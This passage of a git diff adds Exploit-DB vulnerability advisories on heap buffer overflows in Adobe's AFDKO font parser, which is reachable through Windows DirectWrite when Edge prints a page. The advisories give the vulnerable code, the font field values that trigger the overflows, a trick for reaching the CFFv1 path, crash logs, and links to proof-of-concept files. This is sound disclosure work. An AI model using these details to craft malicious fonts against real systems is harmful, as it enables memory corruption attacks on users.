+    #11 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #12 0x7f116e1722b0 in __libc_start_main
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow afdko/c/public/lib/source/cffread/cffread.c:2203:14 in encAdd
+Shadow bytes around the buggy address:
+  0x0c547fff95f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c547fff9600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c547fff9610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c547fff9620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c547fff9630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c547fff9640: fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa
+  0x0c547fff9650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c547fff9660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c547fff9670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c547fff9680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c547fff9690: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==205898==ABORTING
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47093.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47094.txt b/exploits/windows/dos/47094.txt
new file mode 100644
index 000000000..ca9c02b6d
--- /dev/null
+++ b/exploits/windows/dos/47094.txt
@@ -0,0 +1,194 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input. Below is a description of one such security vulnerability in Adobe's library exploitable through the Edge web browser.
+
+-----=====[ Description ]=====-----
+
+The readFDSelect() function in afdko/c/public/lib/source/cffread/cffread.c is designed to read and parse the FDSelect table of an input OpenType font. It is called by cfrBegFont(), the standard entry point function for the "cfr" (CFF Reader) module of AFDKO. The relevant part of the function is shown below:
+
+--- cut ---
+  2352          case 3: {
+  2353              int nRanges = read2(h);
+  2354
+  2355              gid = read2(h);
+  2356              while (nRanges--) {
+  2357                  int fd = read1(h);
+  2358                  long next = read2(h);
+  2359
+  2360                  while (gid < next)
+  2361                      h->glyphs.array[gid++].iFD = (unsigned char)fd;
+  2362              }
+  2363          } break;
+--- cut ---
+
+In the handling of FDSelect Type 3 (see [5]), the code doesn't consider the size of the h->glyphs array and writes to it solely based on the FDSelect information. If the values read from the input stream in lines 2353, 2355 and 2358 exceed the number of glyphs in the font, the array may be overflown in line 2361, corrupting adjacent objects on the heap. The h->glyphs array is initialized in readCharStringsINDEX() based on the number of CharStrings found in the font:
+
+--- cut ---
+  1791      dnaSET_CNT(h->glyphs, index.count);
+--- cut ---
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept font contains an FDSelect table with the following initial values:
+
+- nRanges = 0x0001
+- gid = 0x0000
+- fd = 0x00
+- next = 0xffff (modified from the original 0x0586)
+
+By increasing the value of "next" from 1414 to 65535, we cause the loop in lines 2360-2361 to go largely out of bounds and overflow the h->glyphs array.
+
+-----=====[ Crash logs ]=====-----
+
+A 64-bit build of "tx" compiled with AddressSanitizer, started with ./tx -cff poc.otf prints out the following report:
+
+--- cut ---
+=================================================================
+==235715==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fb8259a282a at pc 0x000000540130 bp 0x7ffe5b379f50 sp 0x7ffe5b379f48
+WRITE of size 1 at 0x7fb8259a282a thread T0
+    #0 0x54012f in readFDSelect afdko/c/public/lib/source/cffread/cffread.c:2361:48
+    #1 0x529a3d in cfrBegFont afdko/c/public/lib/source/cffread/cffread.c:2791:13
+    #2 0x50928d in cfrReadFont afdko/c/tx/source/tx.c:137:9
+    #3 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #4 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #5 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #6 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #7 0x7fb8246e02b0 in __libc_start_main
+    #8 0x41e5b9 in _start
+
+0x7fb8259a282a is located 42 bytes to the right of 143360-byte region [0x7fb82597f800,0x7fb8259a2800)
+allocated by thread T0 here:
+    #0 0x4c63f3 in __interceptor_malloc
+    #1 0x6c9ac2 in mem_manage afdko/c/public/lib/source/tx_shared/tx_shared.c:73:20
+    #2 0x5474a4 in dna_manage afdko/c/public/lib/source/cffread/cffread.c:271:17
+    #3 0x7de64e in dnaGrow afdko/c/public/lib/source/dynarr/dynarr.c:86:23
+    #4 0x7dec75 in dnaSetCnt afdko/c/public/lib/source/dynarr/dynarr.c:119:13
+    #5 0x53e6fa in readCharStringsINDEX afdko/c/public/lib/source/cffread/cffread.c:1791:5
+    #6 0x5295be in cfrBegFont afdko/c/public/lib/source/cffread/cffread.c:2769:9
+    #7 0x50928d in cfrReadFont afdko/c/tx/source/tx.c:137:9
+    #8 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #9 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #10 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #11 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #12 0x7fb8246e02b0 in __libc_start_main
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow afdko/c/public/lib/source/cffread/cffread.c:2361:48 in readFDSelect
+Shadow bytes around the buggy address:
+  0x0ff784b2c4b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ff784b2c4c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ff784b2c4d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ff784b2c4e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ff784b2c4f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0ff784b2c500: fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa fa
+  0x0ff784b2c510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ff784b2c520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ff784b2c530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ff784b2c540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ff784b2c550: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==235715==ABORTING
+--- cut ---
+
+A non-instrumented version of "tx" crashes with a SIGSEGV when it reaches an unmapped memory area:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x0000000000412cd7 in readFDSelect (h=0x710380) at ../../../../../source/cffread/cffread.c:2361
+2361                        h->glyphs.array[gid++].iFD = (unsigned char)fd;
+(gdb) print gid
+$1 = 1998
+(gdb) x/10i $rip
+=> 0x412cd7 <readFDSelect+551>: mov    %cl,0x2a(%rdx)
+   0x412cda <readFDSelect+554>: jmpq   0x412ca3 <readFDSelect+499>
+   0x412cdf <readFDSelect+559>: jmpq   0x412c23 <readFDSelect+371>
+   0x412ce4 <readFDSelect+564>: jmpq   0x412cf7 <readFDSelect+583>
+   0x412ce9 <readFDSelect+569>: mov    -0x8(%rbp),%rdi
+   0x412ced <readFDSelect+573>: mov    $0x1c,%esi
+   0x412cf2 <readFDSelect+578>: callq  0x40cbb0 <fatal>
+   0x412cf7 <readFDSelect+583>: mov    -0x8(%rbp),%rax
+   0x412cfb <readFDSelect+587>: mov    0x35f8(%rax),%rax
+   0x412d02 <readFDSelect+594>: mov    -0x8(%rbp),%rcx
+(gdb) info reg $rdx
+rdx            0x7ffff7ff7020   140737354100768
+(gdb) x/10bx $rdx+0x2a
+0x7ffff7ff704a: Cannot access memory at address 0x7ffff7ff704a
+--- cut ---
+
+A similar Microsoft Edge renderer process crash is also shown below:
+
+--- cut ---
+(5960.48c4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+DWrite!readFDSelect+0xe9:
+00007ffb`29e6bd39 40886c012a      mov     byte ptr [rcx+rax+2Ah],bpl ds:00000263`f1d43002=??
+
+0:038> ? rax
+Evaluate expression: 2628282101824 = 00000263`f1d23040
+0:038> ? rcx
+Evaluate expression: 130968 = 00000000`0001ff98
+0:038> db rax+rcx+2a
+00000263`f1d43002  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+00000263`f1d43012  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+00000263`f1d43022  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+00000263`f1d43032  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+00000263`f1d43042  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+00000263`f1d43052  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+00000263`f1d43062  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+00000263`f1d43072  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+
+0:038> k
+ # Child-SP          RetAddr           Call Site
+00 0000006f`88b4aef0 00007ffb`29e6de90 DWrite!readFDSelect+0xe9
+01 0000006f`88b4af20 00007ffb`29e621e7 DWrite!cfrBegFont+0x5e4
+02 0000006f`88b4b7b0 00007ffb`29df157a DWrite!AdobeCFF2Snapshot+0x10f
+03 0000006f`88b4bcb0 00007ffb`29df0729 DWrite!FontInstancer::InstanceCffTable+0x212
+04 0000006f`88b4be90 00007ffb`29df039a DWrite!FontInstancer::CreateInstanceInternal+0x249
+05 0000006f`88b4c0b0 00007ffb`29dd5a4e DWrite!FontInstancer::CreateInstance+0x192
+06 0000006f`88b4c410 00007ffb`34eb61ab DWrite!DWriteFontFace::CreateInstancedStream+0x9e
+07 0000006f`88b4c4a0 00007ffb`34ea9148 d2d1!dxc::TextConvertor::InstanceFontResources+0x19f
+08 0000006f`88b4c5c0 00007ffb`0fb750f4 d2d1!dxc::CXpsPrintControl::Close+0xc8
+09 0000006f`88b4c610 00007ffb`0fb4fcb0 edgehtml!CDXPrintControl::Close+0x44
+0a 0000006f`88b4c660 00007ffb`0fb547ad edgehtml!CTemplatePrinter::EndPrintD2D+0x5c
+0b 0000006f`88b4c690 00007ffb`0fa2b515 edgehtml!CPrintManagerTemplatePrinter::endPrint+0x2d
+0c 0000006f`88b4c6c0 00007ffb`0f689175 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Trampoline_endPrint+0x45
+0d 0000006f`88b4c700 00007ffb`0eb568f1 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Profiler_endPrint+0x25
+[...]
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+[5] https://docs.microsoft.com/en-us/typography/opentype/spec/cff2#table-12-fdselect-format-3
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47094.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47095.txt b/exploits/windows/dos/47095.txt
new file mode 100644
index 000000000..e0c55c2e3
--- /dev/null
+++ b/exploits/windows/dos/47095.txt
@@ -0,0 +1,251 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input. Below is a description of one such security vulnerability in Adobe's library exploitable through the Edge web browser.
+
+-----=====[ Description ]=====-----
+
+The readCharset() function in afdko/c/public/lib/source/cffread/cffread.c is designed to read and parse the charset information of an input OpenType font. It is called by cfrBegFont(), the standard entry point function for the "cfr" (CFF Reader) module of AFDKO. The relevant part of the function is shown below:
+
+--- cut ---
+[...]
+  2179                  case 1:
+  2180                      size = 1;
+  2181                      /* Fall through */
+  2182                  case 2:
+  2183                      while (gid < h->glyphs.cnt) {
+  2184                          unsigned short id = read2(h);
+  2185                          long nLeft = readN(h, size);
+  2186                          while (nLeft-- >= 0)
+  2187                              addID(h, gid++, id++);
+  2188                      }
+  2189                      break;
+--- cut ---
+
+whereas addID() is defined as follows:
+
+--- cut ---
+  1838  /* Add SID/CID to charset */
+  1839  static void addID(cfrCtx h, long gid, unsigned short id) {
+  1840      abfGlyphInfo *info = &h->glyphs.array[gid];
+  1841      if (h->flags & CID_FONT)
+  1842          /* Save CID */
+  1843          info->cid = id;
+  1844      else {
+  1845          /* Save SID */
+  1846          info->gname.impl = id;
+  1847          info->gname.ptr = sid2str(h, id);
+  1848
+  1849          /* Non-CID font so select FD[0] */
+  1850          info->iFD = 0;
+[...]
+  1859      }
+  1860  }
+--- cut ---
+
+The readCharset() routine doesn't consider the size of the h->glyphs array and writes to it solely based on the charset information. If the value read from the input stream in line 2185 exceeds the number of glyphs in the font, the array may be overflown in addID() (line 1843 or 1846, 1847, 1850), corrupting adjacent objects on the heap. The h->glyphs array is initialized in readCharStringsINDEX() according to the number of CharStrings found in the font:
+
+--- cut ---
+  1791      dnaSET_CNT(h->glyphs, index.count);
+--- cut ---
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept font contains a charset descriptor with the following initial values:
+
+- width = 0x02 (changed from 0x01)
+- id = 0x4141 (changed from 0x0001)
+- nLeft = 0xffff (changed from 0x15)
+
+By increasing the value of "nLeft" from 21 to 65535, we cause the loop in lines 2386-2387 to go largely out of bounds and overflow the h->glyphs array.
+
+In theory, the vulnerability shouldn't be possible to reach in Microsoft DirectWrite and its client applications, because AFDKO is only used there for instancing variable fonts, whereas such CFF2 fonts follow another execution path in the readCharset() function:
+
+--- cut ---
+  2138      if (h->header.major == 2) {
+  2139          postRead(h);
+  2140          if (h->cff2.mvar)
+  2141              MVARread(h);
+  2142          if (!(h->flags & CID_FONT))
+  2143              readCharSetFromPost(h);
+  2144          else {
+  2145              long gid;
+  2146              for (gid = 0; gid < h->glyphs.cnt; gid++) {
+  2147                  abfGlyphInfo *info = &h->glyphs.array[gid];
+  2148                  info->cid = (unsigned short)gid;
+  2149              }
+  2150          }
+  2151          return;
+  2152      }
+--- cut ---
+
+However, we have found that it is in fact possible to trigger the handling of CFFv1 in AFDKO, by appending the old style "CFF " table to a variable font which already includes a "CFF2" one. This causes DirectWrite to correctly load the variable font, but AFDKO still finds "CFF " first and passes it for further parsing, thanks to the following logic in srcOpen() (afdko/c/public/lib/source/cffread/cffread.c):
+
+--- cut ---
+   561                      /* OTF; use CFF table offset */
+   562                      sfrTable *table =
+   563                          sfrGetTableByTag(h->ctx.sfr, CTL_TAG('C', 'F', 'F', ' '));
+   564                      if (table == NULL) {
+   565                          table = sfrGetTableByTag(h->ctx.sfr, CTL_TAG('C', 'F', 'F', '2'));
+   566                      }
+   567                      if (table == NULL)
+   568                          fatal(h, cfrErrNoCFF);
+   569                      origin = table->offset;
+--- cut ---
+
+-----=====[ Crash logs ]=====-----
+
+A 64-bit build of "tx" compiled with AddressSanitizer, started with ./tx -cff poc.otf prints out the following report:
+
+--- cut ---
+=================================================================
+==236657==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a00000b228 at pc 0x0000005563be bp 0x7ffe3c238d10 sp 0x7ffe3c238d08
+WRITE of size 2 at 0x62a00000b228 thread T0
+    #0 0x5563bd in addID afdko/c/public/lib/source/cffread/cffread.c:1843:19
+    #1 0x53f71c in readCharset afdko/c/public/lib/source/cffread/cffread.c:2187:29
+    #2 0x5299c7 in cfrBegFont afdko/c/public/lib/source/cffread/cffread.c:2789:9
+    #3 0x50928d in cfrReadFont afdko/c/tx/source/tx.c:137:9
+    #4 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #5 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #6 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #7 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #8 0x7f7bf34352b0 in __libc_start_main
+    #9 0x41e5b9 in _start
+
+0x62a00000b228 is located 40 bytes to the right of 20480-byte region [0x62a000006200,0x62a00000b200)
+allocated by thread T0 here:
+    #0 0x4c63f3 in __interceptor_malloc
+    #1 0x6c9ac2 in mem_manage afdko/c/public/lib/source/tx_shared/tx_shared.c:73:20
+    #2 0x5474a4 in dna_manage afdko/c/public/lib/source/cffread/cffread.c:271:17
+    #3 0x7de64e in dnaGrow afdko/c/public/lib/source/dynarr/dynarr.c:86:23
+    #4 0x7dec75 in dnaSetCnt afdko/c/public/lib/source/dynarr/dynarr.c:119:13
+    #5 0x53e6fa in readCharStringsINDEX afdko/c/public/lib/source/cffread/cffread.c:1791:5
+    #6 0x5295be in cfrBegFont afdko/c/public/lib/source/cffread/cffread.c:2769:9
+    #7 0x50928d in cfrReadFont afdko/c/tx/source/tx.c:137:9
+    #8 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #9 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #10 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #11 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #12 0x7f7bf34352b0 in __libc_start_main
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow afdko/c/public/lib/source/cffread/cffread.c:1843:19 in addID
+Shadow bytes around the buggy address:
+  0x0c547fff95f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c547fff9600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c547fff9610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c547fff9620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c547fff9630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c547fff9640: fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa fa
+  0x0c547fff9650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c547fff9660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c547fff9670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c547fff9680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c547fff9690: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==236657==ABORTING
+--- cut ---
+
+A non-instrumented version of "tx" crashes with a SIGSEGV when it reaches an unmapped memory area:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x0000000000417d1e in addID (h=0x7103a0, gid=2293, id=18997) at ../../../../../source/cffread/cffread.c:1843
+1843            info->cid = id;
+(gdb) print info
+$1 = (abfGlyphInfo *) 0x743000
+(gdb) print &h->glyphs.array[gid]
+$2 = (abfGlyphInfo *) 0x743000
+(gdb) print gid
+$3 = 2293
+(gdb) x/10gx 0x743000
+0x743000:       Cannot access memory at address 0x743000
+(gdb) bt
+#0  0x0000000000417d1e in addID (h=0x7103a0, gid=2293, id=18997) at ../../../../../source/cffread/cffread.c:1843
+#1  0x0000000000412a57 in readCharset (h=0x7103a0) at ../../../../../source/cffread/cffread.c:2187
+#2  0x000000000040dd64 in cfrBegFont (h=0x7103a0, flags=4, origin=0, ttcIndex=0, top=0x6f6048, UDV=0x0) at ../../../../../source/cffread/cffread.c:2789
+#3  0x0000000000405e4e in cfrReadFont (h=0x6f6010, origin=0, ttcIndex=0) at ../../../../source/tx.c:137
+#4  0x0000000000405c9e in doFile (h=0x6f6010, srcname=0x7fffffffdf4c "poc.otf") at ../../../../source/tx.c:429
+#5  0x000000000040532e in doSingleFileSet (h=0x6f6010, srcname=0x7fffffffdf4c "poc.otf")
+    at ../../../../source/tx.c:488
+#6  0x0000000000402f59 in parseArgs (h=0x6f6010, argc=2, argv=0x7fffffffdc50) at ../../../../source/tx.c:558
+#7  0x0000000000401df2 in main (argc=2, argv=0x7fffffffdc50) at ../../../../source/tx.c:1631
+(gdb)
+--- cut ---
+
+A similar Microsoft Edge renderer process crash is also shown below:
+
+--- cut ---
+(4d58.50bc): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+DWrite!addID+0x33:
+00007ffb`29e6864b 66895cfe28      mov     word ptr [rsi+rdi*8+28h],bx ds:000001ea`f5fee000=????
+
+0:038> ? rsi
+Evaluate expression: 2108661076032 = 000001ea`f5fe9040
+0:038> ? rdi
+Evaluate expression: 2547 = 00000000`000009f3
+0:038> db rsi+rdi*8+28
+000001ea`f5fee000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001ea`f5fee010  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001ea`f5fee020  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001ea`f5fee030  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001ea`f5fee040  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001ea`f5fee050  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001ea`f5fee060  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001ea`f5fee070  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+
+0:038> k
+ # Child-SP          RetAddr           Call Site
+00 00000047`0fcfae10 00007ffb`29e6a262 DWrite!addID+0x33
+01 00000047`0fcfae40 00007ffb`29e6de84 DWrite!readCharset+0x10a
+02 00000047`0fcfae70 00007ffb`29e621e7 DWrite!cfrBegFont+0x5d8
+03 00000047`0fcfb700 00007ffb`29df157a DWrite!AdobeCFF2Snapshot+0x10f
+04 00000047`0fcfbc00 00007ffb`29df0729 DWrite!FontInstancer::InstanceCffTable+0x212
+05 00000047`0fcfbde0 00007ffb`29df039a DWrite!FontInstancer::CreateInstanceInternal+0x249
+06 00000047`0fcfc000 00007ffb`29dd5a4e DWrite!FontInstancer::CreateInstance+0x192
+07 00000047`0fcfc360 00007ffb`34eb61ab DWrite!DWriteFontFace::CreateInstancedStream+0x9e
+08 00000047`0fcfc3f0 00007ffb`34ea9148 d2d1!dxc::TextConvertor::InstanceFontResources+0x19f
+09 00000047`0fcfc510 00007ffb`0fb750f4 d2d1!dxc::CXpsPrintControl::Close+0xc8
+0a 00000047`0fcfc560 00007ffb`0fb4fcb0 edgehtml!CDXPrintControl::Close+0x44
+0b 00000047`0fcfc5b0 00007ffb`0fb547ad edgehtml!CTemplatePrinter::EndPrintD2D+0x5c
+0c 00000047`0fcfc5e0 00007ffb`0fa2b515 edgehtml!CPrintManagerTemplatePrinter::endPrint+0x2d
+0d 00000047`0fcfc610 00007ffb`0f689175 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Trampoline_endPrint+0x45
+0e 00000047`0fcfc650 00007ffb`0eb568f1 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Profiler_endPrint+0x25
+[...]
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47095.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47096.txt b/exploits/windows/dos/47096.txt
new file mode 100644
index 000000000..e829985c5
--- /dev/null
+++ b/exploits/windows/dos/47096.txt
@@ -0,0 +1,181 @@
+-----=====[ Background ]=====-----
+
